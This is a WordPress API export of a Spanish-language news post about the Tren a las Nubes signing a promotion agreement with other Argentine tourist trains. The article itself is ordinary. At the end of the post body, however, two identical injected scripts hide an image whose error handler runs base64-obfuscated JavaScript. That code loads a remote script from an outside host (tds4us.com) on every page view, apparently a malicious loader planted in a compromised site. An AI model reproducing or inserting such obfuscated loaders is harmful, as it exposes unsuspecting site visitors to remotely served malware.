{"id":1587,"date":"2022-10-10T12:40:29","date_gmt":"2022-10-10T15:40:29","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1587"},"modified":"2025-08-14T00:33:41","modified_gmt":"2025-08-14T03:33:41","slug":"el-tren-a-las-nubes-firmo-un-convenio-de-colaboracion-con-trenes-iconicos-argentinos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1587","title":{"rendered":"El Tren a las Nubes firm\u00f3 un convenio de colaboraci\u00f3n con Trenes Ic\u00f3nicos Argentinos"},"content":{"rendered":"\n<h3 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>La r\u00fabrica se realiz\u00f3 en el marco de la Feria Internacional de Turismo, en CABA, y busca potenciar la comercializaci\u00f3n y promoci\u00f3n de los trenes tur\u00edsticos m\u00e1s importantes del pa\u00eds.<\/em><\/h3>\n\n\n\n<p>En la Feria Internacional de Turismo que se realiz\u00f3 en CABA , autoridades salte\u00f1as firmaron el convenio marco con el objetivo de promover estrategias para la comercializaci\u00f3n y promoci\u00f3n del \u00abCircuito de Trenes Ic\u00f3nicos Argentinos\u00bb.<\/p>\n\n\n\n<p>El acuerdo trabajar\u00e1 en un nuevo producto ferro tur\u00edstico que vincule las zonas geogr\u00e1ficas, con la participaci\u00f3n de Aerol\u00edneas Argentinas, para la comercializaci\u00f3n internacional, con una identidad diferencial que permita recorrer nuestro pa\u00eds. Adem\u00e1s, se deber\u00e1n aplicar los principios de Marca Pa\u00eds.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes de Salta,\u00a0<strong>Mario Pe\u00f1a<\/strong>, sostuvo que \u201ces fundamental trabajar en red en productos similares que representan al pa\u00eds en el mundo\u00bb, adem\u00e1s, destac\u00f3 el marco de oportunidades para acuerdos que brinda la FIT.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4349-el-tren-a-las-nubes-firmo-un-convenio-de-colaboracion-con-trenes-iconicos-argentinos.jpg\" alt=\"\" width=\"327\" height=\"218\"\/><\/figure><\/div>\n\n\n<p>El Convenio que incluye a los trenes La Trochita, Patag\u00f3nico y del Fin del Mundo fue destacado como de importancia central para la comercializaci\u00f3n internacional por el titular del Tren a las Nubes: \u201chay &nbsp;un nicho muy importante para el ferroturismo en el mundo, con este convenio apuntamos a ese sector\u201d. Asimismo, Sebasti\u00e1n Vidal se refiri\u00f3 a que se profundizar\u00e1 el intercambio de conocimientos t\u00e9cnicos, log\u00edsticos y operacionales para que los trenes tur\u00edsticos contin\u00faen siendo un producto que se venda internacionalmente.<\/p>\n\n\n\n<p>En relaci\u00f3n con la temporada del Tren a las Nubes, Vidal indic\u00f3 que en este a\u00f1o, que el \u00edcono tur\u00edstico cumpli\u00f3 su 50 aniversario, se bati\u00f3 r\u00e9cord de pasajeros que eligieron Salta y al Tren para disfrutar en sus vacaciones. Sobre esto se\u00f1al\u00f3 que la proyecci\u00f3n para lo que resta del a\u00f1o indica un elevado \u00edndice de comercializaci\u00f3n.<\/p>\n\n\n\n<p>El acto cont\u00f3 con la presencia del ministro de Turismo y Deportes de Salta, Mario Pe\u00f1a; la ministra de Turismo de R\u00edo Negro, Marta V\u00e9lez; el ministro de Turismo de Chubut, Leonardo Gaffet; y representantes de los trenes ic\u00f3nicos Patag\u00f3nico (R\u00edo Negro) La Trochita (Chubut); Tren del Fin del Mundo Tranex S.A. (Tierra del Fuego); tambi\u00e9n el vicepresidente de Tren a las Nubes, Pablo Epstein; y el presidente de la C\u00e1mara de Turismo de Salta, Gustavo Di M\u00e9cola.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Tren a las Nubes firm\u00f3 un convenio de colaboraci\u00f3n con Trenes Ic\u00f3nicos Argentinos\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/n1aUuORaYTE?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La r\u00fabrica se realiz\u00f3 en el marco de la Feria Internacional de Turismo, en CABA, y busca potenciar la comercializaci\u00f3n y promoci\u00f3n de los trenes tur\u00edsticos m\u00e1s importantes del pa\u00eds. En la Feria Internacional de Turismo que se realiz\u00f3 en CABA , autoridades salte\u00f1as firmaron el convenio marco con el objetivo de promover estrategias para [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1588,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-1587","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1587"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1587"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1587\/revisions"}],"predecessor-version":[{"id":7325,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1587\/revisions\/7325"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1588"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1587"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1587"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1587"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}